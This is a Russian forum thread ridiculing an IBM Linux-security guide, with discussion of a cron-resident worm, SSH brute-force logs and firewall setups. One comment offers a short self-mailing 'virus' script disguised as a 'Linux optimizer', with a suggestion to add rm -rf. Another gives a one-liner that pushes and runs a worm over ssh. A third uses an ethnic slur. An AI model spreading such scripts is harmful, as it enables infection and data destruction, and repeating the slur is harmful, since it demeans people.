А попробуй по нему ClamAv'ом пройтись.
Или на сайт касперским закинуть -_-

Ох балин! Пожалуста, вышлите мне! tomodor затем без сомнения следует собачка, затем бальшой снговский портал с началом на красную букву я, затем ру.

а чо по нему проходится то? он скриптом на баше вызывается и написан на языке скриптовом - не помню каком. мож и на баше.
интересно одно - как он попал на машину?!?!

Я вообще ниасилил до самой статьи добраться :]

>А-а-а, мой мозг! Живой вирус для GNU/Linux в стидию!
По крайне мере сумели получить права рута под макосью а это тоже много значит
http://www.opennet.ru/opennews/art.shtml?num=20818

> Предполагаю, что он просочился из-за простого пароля через ссш

> из-за простого пароля через ссш

ССЗБ, не?

Статья реально обоссачная; следует ли из этого, что покупка Sun - тоже прикол?

> Очень маловероятно, что система GNU/Linux, сконфигурированная полным новичком в этом деле, окажется более безопасной, чем система Windows, настроенная специалистом высокого уровня.

Это - пять!

Дорогие новички в этом деле! Не конфигурируйте ничего, пожалуйста. Особенно в соответствии с этой статьёй.

>Несмотря на то, что операционная система GNU/Linux® имеет репутацию намного более защищенной, чем Microsoft® Windows®, рабочие станции под управлением Linux требуют защиты. В этом руководстве вашему вниманию представлены шаги по установке антивирусного программного обеспечения, созданию плана резервного копирования и восстановления, а также по практическому использованию брандмауэра. После изучения этого руководства вы узнаете, как защитить вашу рабочую станцию от большинства атак и несанкционированного доступа, а также получите все необходимые для этого инструменты.

Перевод с политкорректного: Работники IBM вынуждены признать существенно более высокую степень защищённости систем, построенных на ядре Linux. А так как на границах компании с инетом обычно стоит именно такая надёжная и безопасная система, то на неё и надо ставить антивирус для предотвращения распространения вирусов и червей на архитектурно менее защищенные машины, работающие по версиями Windows®. А чтобы наше признание дырявости виндов на уровне архитектуры не так бросалось в глаза, далее мы потолчём воду в ступе про то, что вы и так должны знать.

> Пока не схлопотал на домашней тачке троян [...] Он прописался в файл крона рута и постоянно себя запускал.

Это не "троян", это червь.

Уныло.

Ну если по тексту везде 'linux' на 'windows' заменить, то будет вполне нормально

Простой пароль на ссх - это пять. Мне как-то дали для настройки vps, регнутый пару дней назад с рутовым паролем poiu0987. Шустрые китайцы на нем уже занимались своими делами.После пересоздания и смены пароля понаблюдал, действительно по словарю снова начали перебирать.

> в статье сказано, что линукс не безопаснее венды: нужно ставить антивири, брандмауэры просто полюбэ, что есть 4.2.

>нужно ставить...брандмауэры...что есть 4.2

ну конечно, если твой компьютер в сеть ни разу не включали, то настройка iptables ему не нужна

p.s. улыбнуло: "Загрузите Ubuntu, чтобы выполнить на практике все задания, описанные в этом руководстве."

Очень полезная статья для новичков. Спасибо :-)

А ведь есть те, кто верит. Один мой знакомый, которому я поставил бубунту, прочёл где-то опус про вирусы под линукс и стал задавать вопросы. Я ему и так и сяк объяснял, приводил собственные примеры. Вижу по глазам, не доверяет ;-) Пришлось поставить ему clamav, шоп спал спокойно ;-)

Mar 18 23:28:02 vps sshd[28043]: Invalid user 1 from 210.83.70.203
Mar 18 23:28:04 vps sshd[30306]: Invalid user Aidas from 210.83.70.203
Mar 18 23:28:06 vps sshd[1941]: Invalid user Aidas from 210.83.70.203
Mar 18 23:28:08 vps sshd[6001]: Invalid user Daimler from 210.83.70.203
Mar 18 23:28:10 vps sshd[10051]: Invalid user Daimler from 210.83.70.203
Mar 18 23:28:12 vps sshd[14126]: Invalid user IBM from 210.83.70.203
Mar 18 23:28:14 vps sshd[16355]: Invalid user Neto from 210.83.70.203
Mar 18 23:28:16 vps sshd[22111]: Invalid user TEST from 210.83.70.203
Mar 18 23:28:18 vps sshd[26120]: Invalid user Ventamaxx from 210.83.70.203
Mar 18 23:28:20 vps sshd[30146]: Invalid user Ventamaxx from 210.83.70.203
Mar 18 23:28:22 vps sshd[1741]: Invalid user a from 210.83.70.203
Mar 18 23:28:24 vps sshd[5818]: Invalid user a2j from 210.83.70.203
Mar 18 23:28:26 vps sshd[9870]: Invalid user aaron from 210.83.70.203
Mar 18 23:28:28 vps sshd[13910]: Invalid user abazantes from 210.83.70.203
Mar 18 23:28:30 vps sshd[18006]: Invalid user abazantes from 210.83.70.203
Mar 18 23:28:32 vps sshd[18020]: Invalid user abbas from 210.83.70.203
Mar 18 23:28:34 vps sshd[18025]: Invalid user abj from 210.83.70.203
Mar 18 23:28:36 vps sshd[18035]: Invalid user abj from 210.83.70.203
Mar 18 23:28:38 vps sshd[18043]: Invalid user abode from 210.83.70.203
Mar 18 23:28:40 vps sshd[18049]: Invalid user abrace from 210.83.70.203
Mar 18 23:28:42 vps sshd[18055]: Invalid user abrace from 210.83.70.203
Mar 18 23:28:44 vps sshd[18063]: Invalid user abuse from 210.83.70.203
Mar 18 23:28:47 vps sshd[18071]: Invalid user abused from 210.83.70.203
Mar 18 23:28:49 vps sshd[18080]: Invalid user access from 210.83.70.203
Mar 18 23:28:50 vps sshd[18087]: Invalid user account10 from 210.83.70.203
Mar 18 23:28:53 vps sshd[18094]: Invalid user accounts from 210.83.70.203
Mar 18 23:28:55 vps sshd[18101]: Invalid user acompany from 210.83.70.203
Mar 18 23:28:57 vps sshd[18107]: Invalid user acompany from 210.83.70.203
Mar 18 23:28:59 vps sshd[18114]: Invalid user acra from 210.83.70.203
Mar 18 23:29:01 vps sshd[18119]: Invalid user acra from 210.83.70.203
Mar 18 23:29:03 vps sshd[18134]: Invalid user adami from 210.83.70.203
Mar 18 23:29:05 vps sshd[18141]: Invalid user adami from 210.83.70.203
Mar 18 23:29:07 vps sshd[18150]: Invalid user adami from 210.83.70.203
Mar 18 23:29:09 vps sshd[18160]: Invalid user adela from 210.83.70.203
Mar 18 23:29:11 vps sshd[18165]: Invalid user admin from 210.83.70.203
Mar 18 23:29:13 vps sshd[18173]: Invalid user admin from 210.83.70.203
[...]
Mar 18 23:52:44 vps sshd[22464]: Invalid user emmabirkinshaw from 210.83.70.203
Mar 18 23:52:46 vps sshd[22500]: Invalid user emmanuel from 210.83.70.203
Mar 18 23:52:49 vps sshd[23554]: Invalid user enkel from 210.83.70.203
Mar 18 23:52:51 vps sshd[23573]: Invalid user enkel from 210.83.70.203
Mar 18 23:52:53 vps sshd[23592]: Invalid user enkel from 210.83.70.203
Mar 18 23:52:54 vps sshd[23608]: Invalid user epaper from 210.83.70.203
Mar 18 23:53:07 vps sshd[23751]: Did not receive identification string from 210.83.70.203

И тут бот заткнулся. Бедный бот такой бедный, он не знал, что парольная аутентификация выключена.

>А ведь есть те, кто верит. Один мой знакомый, которому я поставил бубунту, прочёл где-то опус про вирусы под линукс и стал задавать вопросы. Я ему и так и сяк объяснял, приводил собственные примеры. Вижу по глазам, не доверяет ;-) Пришлось поставить ему clamav, шоп спал спокойно ;-)

Теперь другим он будет рассказывать что они стопудово есть, ведь антивирь у него от них стоит, тот еще небось будет периодически признак жизни подавать, вот и расскажет владелец как на linux у него антивирь вирусы кокает.

А китайцы гребаные любят пароли по подбирать, уроды узкоглазые.
я конечно не этот, но они уроды.

А за такую статью на костер в пору.

Слух ходил про вирус живой, где опус по фактам из жизни?

> как он попал на машину?
echo EOF|cat worm.sh - | ssh user@host "cat > ~/somefile <<EOF;\
. somefile"
при простом пароле - делать нечего

когда ещё анонимусом был, постил своё, никому не нужное мнение на эту тему.

В плане принципиальной надёжности и защищённости системы продукция MS не конкурент Linux и BSD, но обращу внимание комрадов на вот какой момент. Самый страшный вирус под Linux, как известно, это rm -fr, и если его запустит обычный пользователь (которго можно обманом заставить это сделать или ещё как), то это не убьёт систему, но может убить все данные, на которые имеет права этот пользователь, что может оказаться фатальным (данные могут стоить гораздо важнее чем весь компьютер и живая ОС неособо подсластит пилюлю). Понятно, что это, отчасти, проблема пользователя (как сейчас многие и скажут), но ИМХО надо в эту сторону копать. Например дать возможность отслеживать и контроллировать действия приложений, изменить подсистему прав так, чтобы пользователь писАл файлы сразу с правами для него - только для чтения, а на любое изменение запрашивался бы пароль чем-то вроде kdesu-подобными.

Ну вот вам вирус

Накропал действующий макет вируса по линукс, наслаждайтесь. rm -rf добавляйте по вкусу.

#!/bin/sh

(echo -e "Оптимизатор линукса!\nПопался замечательный скрипт! Ускоряет линукс в два раза!") | mail -s "Оптимизатор линукса!"-a $0 `cat /etc/passwd |grep ":/home" | cut -d: -f1; cat ~/.kde/share/apps/kabc/std.vcf* | grep "EMAIL" | cut "-d:" -f2`

> файлы сразу только для чтения
ну и, umask 0377 уже отменили что ли?

что-то вчера искал его - и не нашел. то ли стер его, то ли при обновлении его удалила система. остались логи и капчуры от вайршарка, где видна работа червя.

был он в директории /tmp/.img/

блин зачем... вот чёрт он потерялся..) интересно посмотреть на троян было

попробую сегодня поискать. вчера во время поиска свет потух......привет, кризис!

>А бывают линуксы, которые с включённым selinux будут нормально работать?
>fixed.
Бывают. Вылазь из песочницы, заодно почитай про apparmor.

>А китайцы гребаные любят пароли по подбирать, уроды узкоглазые.
Китайцев просто много, даже если каждый введет по десятку паролей, любой сервак согласится :-)

>Самый страшный вирус под Linux, как известно, это rm -fr, и если его запустит обычный пользователь (которго можно обманом заставить это сделать или ещё как), то это не убьёт систему, но может убить все данные, на которые имеет права этот пользователь, что может оказаться фатальным (данные могут стоить гораздо важнее чем весь компьютер и живая ОС неособо подсластит пилюлю).
Убить все данные, к которым имеет доступ пользователь можно в любой системе.

>Простой пароль на ссх - это пять.
А что, кто-то держит открытый ццх(кроме ну очень острой необходимости)? За это сразу мордой в пол и яйца на затылок :-)
hint: knockd.

>hint: knockd.

А вот скажем если вы в глухой тайге и доступны только машины с оффтопиком, то вы как кнокаетесь? С телнетом маетесь (вендовая консоль это буэээээ) или тот же putty умеет это дело автоматизировать?

> Если вы попытаетесь запустить разработанную для Windows вредоносную программу в среде GNU/Linux, она не сможет определить, что она должна делать, поскольку все ее инструкции чтения, записи и выполнения написаны в соответствии с архитектурой Windows

во во - давно пора кейгены под вайном запукать

>А вот скажем если вы в глухой тайге и доступны только машины с оффтопиком, то вы как кнокаетесь? С телнетом маетесь (вендовая консоль это буэээээ) или тот же putty умеет это дело автоматизировать?
Ну если в глухой тайге, то нафиг вообще нужен ццх? Сайга удобнее :-)
А если доступны только машины с офтопиком, предварительно записать и взять с собой в виндовую тайгу загрузочную флешку с линуксом вероятно, религия запрещает? И эта, ты почитай, что умеет knockd и не изображай таежного толстого глухого тролля :-)

>> Например, если вы используете в вашей рабочей среде несколько операционных систем, вредоносное ПО может легко попасть из системы GNU/Linux в систему Windows через электронную почту, USB-накопитель или общий Samba-ресурс.

> жесть

А что здесь не так? Например, если на публичном FTP-сервере какой-либо домашней сети нет clamav, то этот FTP-сервер вполне может стать носителем заразы. Это же касается почтовых серверов - уже давно общей практикой является прикручивание к ним антивируса.

> Абсолютно глупо. Проще уже на винмашину и поставить антивируса.

ORLY? Что проще - поставить антивирус на сервер или на сотни win-машин?

> А какое отношение к этому имеет Linux?

Админ локалхоста? ;)

> ну конечно, если твой компьютер в сеть ни разу не включали, то настройка iptables ему не нужна

Я на домашнем компе не трогал iptables вообще. Это очень страшно? :) Меня ждёт DoS? :)

P.S. Dходящие подключения принимает только pureftpd, когда я его вручную запускаю.

OMG, проще уже через scp. :)

>Для повышения безопасности и атакоустойчивости вокруг танка Т-90 рекомендуется устанавливать заборчик из фанеры не менее 5мм толщиной.

У нас один раз с БМП украли штатное бревно... а вот заборчик бы спас :-)

>>А китайцы гребаные любят пароли по подбирать, уроды узкоглазые. >Китайцев просто много, даже если каждый введет по десятку паролей, любой сервак согласится :-)

в цитатник :))

Для ценных данный обязательно делается бекап, если его нет - значит данные были не особо нужные и на их потерю можно забить.

А я вчера чернобылем 98-ю убил, ностальгия :) http://s54.radikal.ru/i145/0903/19/5eee06ba4b94.png

О необходимости брандмаура на линуксе а нужен ли он? При корректно настроенном линухе файрвол не нужен. Что обычно открыто на рабочей станции под линуксом. tcp 0 0 0.0.0.0:9090 0.0.0.0:* LISTEN 12190/rtorrent tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 5436/mysqld tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5734/smbd tcp 0 0 0.0.0.0:4560 0.0.0.0:* LISTEN 3948/sim tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 5341/sshd tcp 0 0 192.168.1.1:631 0.0.0.0:* LISTEN 5532/cupsd tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5734/smbd К примеру моя рабочая машинка. Извините что тут ломать? Samba слушает только интрефейс который смотрит в локальную сеть. А остальное и так должно слушать входящие сообщения. Ну вот типовой файрвол который у меня ставиться на рабочие станции #!/bin/bash MY_IP=`/sbin/ifconfig eth0 |grep "inet\ addr:"|awk '{print $2}'|sed -e s/addr://` INET_IP=`/sbin/ifconfig eth1 |grep "inet\ addr:"|awk '{print $2}'|sed -e s/addr://` IPT=/sbin/iptables #Drop all chains $IPT -X $IPT -F $IPT -P INPUT DROP $IPT -P FORWARD DROP $IPT -P OUTPUT ACCEPT #localhost rules $IPT -A INPUT -p ALL -i lo -s 127.0.0.1 -j ACCEPT $IPT -A INPUT -p ALL -i lo -s $MY_IP -j ACCEPT $IPT -A INPUT -p ALL -i lo -s $INET_IP -j ACCEPT #bad tcp packets $IPT -A INPUT -p tcp --tcp-flags SYN,ACK SYN,ACK -m state --state NEW -j REJECT --reject-with tcp-reset $IPT -A INPUT -p tcp ! --syn -m state --state NEW -j LOG --log-prefix "New not syn:" $IPT -A INPUT -p tcp ! --syn -m state --state NEW -j DROP #ICMP rules $IPT -A INPUT -p ICMP -i eth0 --icmp-type echo-request -j ACCEPT $IPT -A INPUT -p ICMP -i eth0 --icmp-type echo-reply -j ACCEPT # $IPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #filtered ports #Это мне любимому нужен доступ в копроративную сеть для #администрирования из дома $IPT -A INPUT -p tcp -s 0/0 --dport 22 -j ACCEPT #$IPT -A INPUT -p tcp -s 0/0 --dport 20:21 -j ACCEPT #Cвоих я не боюсь $IPT -A INPUT -p all -s 192.168.1.0/24 -j ACCEPT #Траф не лимитирован у нас flat $IPT -A INPUT -p tcp -s 0/0 --dport 9090 -j ACCEPT $IPT -A INPUT -p udp -s 0/0 --dport 4444 -j ACCEPT

Файрвол это скорей для самоуспокоения...

О необходимости брандмаура на линуксе а нужен ли он? При корректно настроенном линухе файрвол не нужен. Что обычно открыто на рабочей станции под линуксом. tcp 0 0 0.0.0.0:9090 0.0.0.0:* LISTEN 12190/rtorrent

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 5436/mysqld

tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5734/smbd

tcp 0 0 0.0.0.0:4560 0.0.0.0:* LISTEN 3948/sim

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 5341/sshd

tcp 0 0 192.168.1.1:631 0.0.0.0:* LISTEN 5532/cupsd

tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5734/smbd

К примеру моя рабочая машинка. Извините что тут ломать? Samba слушает только интрефейс который смотрит в локальную сеть. А остальное и так должно слушать входящие сообщения. Ну вот типовой файрвол который у меня ставиться на рабочие станции #!/bin/bash MY_IP=`/sbin/ifconfig eth0 |grep "inet\ addr:"|awk '{print $2}'|sed -e s/addr://`

INET_IP=`/sbin/ifconfig eth1 |grep "inet\ addr:"|awk '{print $2}'|sed -e s/addr://`

IPT=/sbin/iptables

#Drop all chains $IPT -X $IPT -F $IPT -P INPUT DROP $IPT -P FORWARD DROP $IPT -P OUTPUT ACCEPT #localhost rules $IPT -A INPUT -p ALL -i lo -s 127.0.0.1 -j ACCEPT $IPT -A INPUT -p ALL -i lo -s $MY_IP -j ACCEPT $IPT -A INPUT -p ALL -i lo -s $INET_IP -j ACCEPT #bad tcp packets $IPT -A INPUT -p tcp --tcp-flags SYN,ACK SYN,ACK -m state --state NEW -j REJECT --reject-with tcp-reset $IPT -A INPUT -p tcp ! --syn -m state --state NEW -j LOG --log-prefix "New not syn:" $IPT -A INPUT -p tcp ! --syn -m state --state NEW -j DROP #ICMP rules $IPT -A INPUT -p ICMP -i eth0 --icmp-type echo-request -j ACCEPT $IPT -A INPUT -p ICMP -i eth0 --icmp-type echo-reply -j ACCEPT # $IPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #filtered ports #Это мне любимому нужен доступ в копроративную сеть для администрирования из дома $IPT -A INPUT -p tcp -s 0/0 --dport 22 -j ACCEPT #$IPT -A INPUT -p tcp -s 0/0 --dport 20:21 -j ACCEPT #Cвоих я не боюсь $IPT -A INPUT -p all -s 192.168.1.0/24 -j ACCEPT #Траф не лимитирован у нас flat $IPT -A INPUT -p tcp -s 0/0 --dport 9090 -j ACCEPT $IPT -A INPUT -p udp -s 0/0 --dport 4444 -j ACCEPT

Файрвол это скорей для самоуспокоения... PS Я решил перепостить месагу может теперь переносы правильно расставит

ssh должен не допускать подключению от имени root. У тебя походу было. У нас студент-практикант поставил такой сервер. Мало того что можно было зайти рутом но и еще и пароль стоял 1q2w3e4r5t. Машинку взломали за сутки брутфорса.